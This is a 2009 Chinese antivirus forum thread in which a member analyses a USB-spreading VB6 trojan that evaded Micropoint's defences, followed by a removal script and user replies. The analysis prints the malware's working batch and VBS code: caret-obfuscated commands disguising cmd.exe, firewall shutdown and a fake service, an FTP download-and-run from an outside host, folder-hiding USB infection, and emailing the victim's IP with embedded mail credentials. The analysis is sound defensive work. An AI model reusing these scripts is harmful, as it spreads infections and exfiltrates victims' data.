微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 主动防御 » 【已封】ChiChou517826104 过主防样本分析  

作者:
标题: 【已封】ChiChou517826104 过主防样本分析
点饭的百度空间
银牌会员




积分 2315
发帖 2236
注册 2007-11-30
#1  【已封】ChiChou517826104 过主防样本分析

2009年05月03日 星期日 18:26
过微点样本down.exe(Trojan.Win32.IAgent)的分析。

帮同学修复U盘的时候拿到的。
一个猥琐的木马,使用了大量的脚本、批处理、计划任务等手段,终于逃过了Micropoint的监控……
非常猥琐~

下面是分析~

Trojan/Win32.IAgent

病毒使用vb6编写~   ASPack加壳。

原始工程名~
D盘感染(2.22确定).vbp

源码应该放在作者电脑的E盘~~~哈哈~



作者的VB安装目录
X:\Program Files\Microsoft Visual Studio\VB98

作者Q号~~ (sunhopp@tom.com)


使用at命令创建大量计划任务,命令行为
cmd /c cmd<C:\windows\system32\attusb.dll



在system32目录下创建

%systsmroot%\system32\attusb.dll ;一个辅助感染的批处理
%systsmroot%\system32\down.exe ;木马的副本



attusb.dll内容是一个批处理文件。代码如下:

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^c^m^d^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^S^y^s^t^e^n^.^e^x^e /y
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^p^i^n^g^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^E^X^P^L^0^R^E^R^.^E^X^E /y
Systen /c %SystemRoot%\system32\autousb.bat

在计划任务里面使用 cmd /c<C:\windows\system32\attusb.dll 命令行来运行这个批处理。
使用“^“逃避路径检测。cmd执行的是这样的代码

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
;查找 systen.exe 进程(cmd的副本)。同时关闭cmd.exe
copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\Systen.exe /y
;复制 cmd.exe,改名为 systen.exe
copy C:\WINDOWS\system32\ping.exe C:\WINDOWS\system32\EXPL0RER.EXE /y
;复制 ping.exe,改名为 explorer.exe
Systen /c %SystemRoot%\system32\autousb.bat
;使用systen.exe(实际为cmd.exe的副本)执行 %SystemRoot%\system32\autousb.bat

遍历D盘根目录下的所有文件夹,保存列表到
%SystemRoot%\system32\ok.txt



同时隐藏D盘所有文件夹,并建立同名的.exe副本诱惑用户点击



如果插入了U盘,将做同样的感染。

创建win.bat,内容如下。
功能是用来创建自启动项(不过我没有看到生成了什么文件)

@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
:ok
@ net stop sharedaccess
sc stop sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
@ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S                                                                                /c start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用,任何依赖它的服务将无法启动。"
@ sc start DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
echo o autoqq.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
ftp -s:1.RMVB
del 1.RMVB
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
echo o autoqq.3322.org > 2.RMVB&echo 4567 >> 2.RMVB&echo 4567 >> 2.RMVB&echo get boot.exe boot.exe >> 2.RMVB&echo del down.exe >> 2.RMVB&echo bye >> 2.RMVB
ftp -s:2.RMVB
del 2.RMVB
exit

创建autousb.bat,用来写入autorun

setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f   "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB   "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
:3
EXPL0RER /n 10 127.0.1 &goto 1
;其实是调用ping延时 + 死循环

创建mail3.vbs,用来发送邮件(什么年代了。。。)
哈哈,这位大牛的Q号也在哈~

On Error Resume Next
mailto="294503954@qq.com" '路过~~~
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\WINDOWS\system32\mailbody.txt",1)
mailbody=f.ReadAll
f.Close
NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
set Email = CreateObject("CDO.Message")
Email.From = "sunhopp@tom.com"
Email.To = mailto
Email.Subject = mailbody
Email.Textbody = mailbody
with Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2
.Item(NameSpace&"smtpserver") = "smtp.tom.com"
.Item(NameSpace&"smtpserverport") = 25
.Item(NameSpace&"smtpauthenticate") = 1
.Item(NameSpace&"sendusername") = "sunhopp"'这位同学的邮箱账户~~~
.Item(NameSpace&"sendpassword") = "autocad" '这位同学的邮箱密码~~~
.Update
end With
Email.Send
Wscript.quit

创建mailbody.txt。我只在里面看到了本机的IP。估计还有其他记录功能。

略过更多废话。

似乎样本在卡饭病毒区也有。看来这个东东已经存活很久了……


后续~

既然这位同学这么喜欢批处理,那我也整一个吧……

@echo off
del /f %systemroot%\Tasks\At*.job
del /f %systemroot%\system32\ok.txt
del /f %systemroot%\system32\down.exe
del /f %systemroot%\system32\attusb.dll,%systemroot%\system32\mail3.vbe
del /f %systemroot%\system32\autousb.bat,%systemroot%\system32\win.bat,%systemroot%\system32\dd.bat
taskkill /f /im explroer.exe
taskkill /f /im systen.exe
taskkill /f /im systen32.exe
del /f %systemroot%\system32\explroer.exe
del /f %systemroot%\system32\systen32.exe
del /f %systemroot%\system32\systen.exe
echo OK.
pause

[ Last edited by 点饭的百度空间 on 2010-6-4 at 00:35 ]

※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint
2009-5-3 22:09
查看资料  发送邮件  访问主页  发短消息   编辑帖子
御剑临风.
禁止访问





积分 625
发帖 659
注册 2009-4-10
#2  

官方说了不防批处理啊。。。。。

微点说你还可以卸载微点。。 你可以关机,你可以格式化硬盘

微点不会拦截的,他说是用户行为!

※ ※ ※ 本文纯属【御剑临风.】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-5-3 22:38
查看资料  发送邮件  发短消息   编辑帖子
snhao
银牌会员




积分 1791
发帖 1782
注册 2007-6-12
#3  

楼上的来了个180度大转弯啦。

※ ※ ※ 本文纯属【snhao】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

东方微点论坛
2009-5-4 09:36
查看资料  发短消息   编辑帖子
mamsds
银牌会员




积分 1373
发帖 1360
注册 2008-3-15
来自 乌克兰
#4  

这个.........
微点确实要改!!!
不防不行!!!!

※ ※ ※ 本文纯属【mamsds】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.
2009-5-4 18:13
查看资料  发送邮件  发短消息  QQ   编辑帖子
112112
高级用户





积分 516
发帖 515
注册 2008-12-23
#5  

难道是有名的上M的文件夹病毒吗 害的一堆人来找我修优盘 说文件全被杀毒软件删了,。。。

※ ※ ※ 本文纯属【112112】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-5-8 21:24
查看资料  发短消息   编辑帖子
vestige
新手上路





积分 23
发帖 23
注册 2007-11-20
#6  

就这病毒,丫的· 其他的不说,你光更改那些个文件夹属性都麻烦·

※ ※ ※ 本文纯属【vestige】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-5-9 11:33
查看资料  发送邮件  发短消息   编辑帖子
cmdbxh
新手上路





积分 4
发帖 4
注册 2009-5-13
#7  

呵呵,看起来蛮好。也说明微点需要改进。

※ ※ ※ 本文纯属【cmdbxh】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-5-13 21:16
查看资料  发送邮件  发短消息   编辑帖子
imeis
新手上路





积分 6
发帖 6
注册 2008-6-16
#8  

=_=前2天就被这个东西给郁闷了一下,因为我的电脑默认显示文件名后缀和隐藏文件的,所以打开U盘一下子就看出来不对了,但是好奇点了一下,心想反正微软很强大,看看它能干嘛吧……于是微软把它杀掉了,但是我D盘里被变成隐藏的文件夹怎么都改不回来属性,只好又建新的丢进去,把隐藏的删掉……

※ ※ ※ 本文纯属【imeis】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-6-17 03:52
查看资料  发短消息   编辑帖子
kn88
新手上路





积分 7
发帖 7
注册 2009-2-13
#9  

这点微点做的不好,不过可以加个红伞啊

※ ※ ※ 本文纯属【kn88】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-6-17 09:08
查看资料  发送邮件  发短消息   编辑帖子
zzjzzpgg12
注册用户





积分 192
发帖 186
注册 2009-1-27
#10  

我也在一台机子上发现了 这个东西。。微点现在好像她还没有反映,可能是没连外网吧。
不过我好奇的事他是怎么执行的啊?找到了个vbs,不幸被我删了。在attusb。dll,bat里没见有那个VBS啊~~

※ ※ ※ 本文纯属【zzjzzpgg12】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2010-6-3 20:06
查看资料  发送邮件  发短消息   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号